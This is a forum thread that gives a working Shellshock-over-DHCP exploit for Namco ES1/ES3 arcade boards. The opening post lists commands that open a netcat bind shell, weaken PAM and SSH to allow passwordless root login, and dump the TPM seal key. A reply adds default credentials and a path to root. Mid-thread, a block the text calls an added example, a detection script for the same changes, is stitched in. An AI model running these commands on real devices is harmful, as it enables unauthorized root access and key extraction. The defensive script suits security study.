Public Domain Namco ES1/ES3 (Linux) full access for easy repair (brick, change gpu, broken hdd etc.)

Discussion in 'Arcade and Supergun' started by Jackalus, Jun 10, 2016.

  1. Jackalus

    Jackalus Robust Member

    Joined: Jan 22, 2011
    Messages: 237
    Likes Received: 23

    Everyone loves a backstory:
    It was a rainy evening in Finland and I had just gotten this PCB; me and a friend were brainstorming various ways to get in. We tried almost all known tricks and Linux tricks but nothing worked.

    Until, that is, my friend Mr. xxx woke me up in the morning, telling me he owned it. Of course I was like "sure man", plz tell me more. But he really did figure this out in less than 24 hours.

    Come on man, cut to the chase:

    OK so, since this exploit was leaked by my former friend to his friends for "repair help" (profit) when he said he wouldn't do it, I just don't care anymore.

    Here are the details for the Linux (not Windows, even though I have that exploited too) version of the ES1/ES3 exploit.

    With this method you can "remarry" a new HDD to the system, repair broken systems to replace parts or even change game files yourself.

    To remarry and other stuff, I can write about that later. But now, off to the exploit.

    Not intended for piracy purposes!

    NOTE:
    UNDER NO CIRCUMSTANCES SHOULD YOU CONNECT THE ES1 HDD TO A WINDOWS PC, IT WILL BRICK.
    Use a standalone USB dock with 2 SATA connectors to clone it and then use the cloned HDD to dump the games, or a Linux machine if you want to change the original HDD itself.
    If you have connected the HDD to a Windows PC, DO NOT BOOT IT ON THE PCB OR IT WILL SUICIDE!!!!!!!!!!!!!!!!!!!!!!!!

    Known games:
    - Tank Tank Tank
    - Dead Heat
    - Dead Heat Riders
    - Nirin

    Requirements:
    - Some Linux knowledge (although also possible with Windows, but Linux is far easier)
    - ES1/ES3 motherboard with Linux
    - Network cable
    - VM or dedicated Linux machine

    Steps:
    1. Install dhcpd on the Linux machine (disable all other DHCP in the network if you use, for example, a router)
    2. Edit/add in the dhcpd config (you can limit the DHCP to the ES1 machine's MAC too if you want to be safe):
    option domain-name "() { :;}; /bin/nc -lp23 -c/bin/sh&";
    3. Put this in a new local file:
    sed -i 's/nullok_secure$/nullok/' /etc/pam.d/common-auth
    sed -i 's/.*PermitEmptyPasswords.*/PermitEmptyPasswords yes/' /etc/ssh/sshd_config
    /etc/init.d/ssh restart
    4. Connect RJ45 cable to ES1 and your PC
    5. Boot the system. Once it's pingable,
    cat <thatfile> | nc -q1 <192.168.X.X> 23
    6. Profit and log in as root via PuTTY/ssh or similar without a password.

    Proper explanation of the exploit:
    blog.trendmicro.com/trendlabs-…llshock-exploit-via-dhcp/

    Note:
    - On some systems you have like a 10-second window to execute the exploit, as they shut down all network connections. You need to quickly connect and dump the TPM key with this command (to mount it on another Linux machine, see note!!!!!!!!!!!):
    arcadeunsealkey /etc/arcade/sealkey

    Credits:
    - android for the PCB
    - Mr. xxx who didn't want his real name/nick revealed.

    Exploit was found on: 11th, June of 2015

    If someone here comes spewing stuff that we weren't the first to do this, I will release all the logs showing the truth.

    Enjoy

    RE-UPPED TO ASSEMBLER GAMES SINCE IT WAS CENSORED ON OTHER FORUMS!

    I will write all my new tutorials here, land of the free.
     
    kzd, SONIC3D, BLUamnEsiac and 2 others like this.
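
A defender-side check for the state this procedure leaves behind, as an added example that is not part of the original post: it flags a DHCP option value shaped like a bash function definition and the two settings the step 3 commands change in /etc/ssh/sshd_config and /etc/pam.d/common-auth. The function names and the sample files are constructed for illustration, and the DHCP text is assumed to be a saved copy of option lines such as a dhcpd config.

```shell
#!/bin/sh
# Added example (not from the thread): checks for the changes the post describes.

# Print lines whose quoted option value begins a bash function definition "() {".
find_funcdef_values() {
    grep -nE '"[[:space:]]*\(\)[[:space:]]*\{' "$1"
}

# True if sshd_config has an active "PermitEmptyPasswords yes".
sshd_allows_empty() {
    grep -Eiq '^[[:space:]]*PermitEmptyPasswords[[:space:]]+yes' "$1"
}

# True if an active pam_unix line has bare "nullok" rather than "nullok_secure".
pam_allows_empty() {
    grep -Eq '^[^#]*pam_unix\.so.*[[:space:]]nullok([[:space:]]|$)' "$1"
}

# audit DHCP_TEXT SSHD_CONFIG PAM_FILE: prints findings, exit status = their count.
audit() {
    n=0
    if find_funcdef_values "$1"; then
        echo "FINDING: function definition in a DHCP option value ($1)"; n=$((n + 1))
    fi
    if sshd_allows_empty "$2"; then
        echo "FINDING: PermitEmptyPasswords yes ($2)"; n=$((n + 1))
    fi
    if pam_allows_empty "$3"; then
        echo "FINDING: pam_unix nullok without _secure ($3)"; n=$((n + 1))
    fi
    return "$n"
}

# Constructed sample files: one altered set, one clean set.
make_samples() {
    mkdir -p "$1/bad" "$1/ok"
    printf 'option domain-name "() { :;}; echo constructed-sample";\n' > "$1/bad/dhcp"
    printf 'PermitEmptyPasswords yes\n' > "$1/bad/sshd_config"
    printf 'auth [success=1 default=ignore] pam_unix.so nullok\n' > "$1/bad/common-auth"
    printf 'option domain-name "example.lan";\n' > "$1/ok/dhcp"
    printf '#PermitEmptyPasswords no\n' > "$1/ok/sshd_config"
    printf 'auth [success=1 default=ignore] pam_unix.so nullok_secure\n' > "$1/ok/common-auth"
}

d=$(mktemp -d)
make_samples "$d"
audit "$d/bad/dhcp" "$d/bad/sshd_config" "$d/bad/common-auth" || echo "findings: $?"
audit "$d/ok/dhcp" "$d/ok/sshd_config" "$d/ok/common-auth" && echo "clean"
rm -rf "$d"
```
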
  2. Kappa

    Kappa Peppy Member

    Joined: Aug 12, 2014
    Messages: 346
    Likes Received: 35

    Is this guide meant for ES1, 2 and 3 or just 1 and 3?
     
  3. Jackalus

    Jackalus Robust Member

    Joined: Jan 22, 2011
    Messages: 237
    Likes Received: 23

    Both if it runs Linux. They are essentially the same system but 3 has more horsepower.
     
  4. SONIC3D

    SONIC3D Spirited Member

    Joined: Oct 30, 2008
    Messages: 149
    Likes Received: 33

    Thanks for the exploit info.
    =)
     
  5. kzd

    kzd Spirited Member

    Joined: Oct 26, 2012
    Messages: 121
    Likes Received: 16

    Cheers Jack. Hope to see more of this in the future!
     
  6. ValdikSS

    ValdikSS Newly Registered

    Joined: Jun 28, 2016
    Messages: 1
    Likes Received: 0

    Jackalus, actually it's as simple as starting /usr/sbin/sshd using shellshock. Then you can log in as user "user" with password "live" and execute sudo -i to get root.

    I wrote an article about Arcade Linux and ES1 protection before knowing about shellshock. In case you're interested, it's here:
    https://medium.com/@ValdikSS/resear...overing-namco-system-es1-arcades-1f8423fdeb3b
    It also mentions why HDDs are hoaxed if connected to a Windows PC and how to repair them to make the game boot again.
     
  7. Jackalus

    Jackalus Robust Member

    Joined: Jan 22, 2011
    Messages: 237
    Likes Received: 23

    Nice write-up, I knew most of that stuff :)
    I have a lot of exploits for various systems but because of mass piracy in the arcade scene I will not leak them. You really think no one has hacked all the systems in the background without telling people? Of course, but no one wants another Taito Type X2 mass piracy issue.
     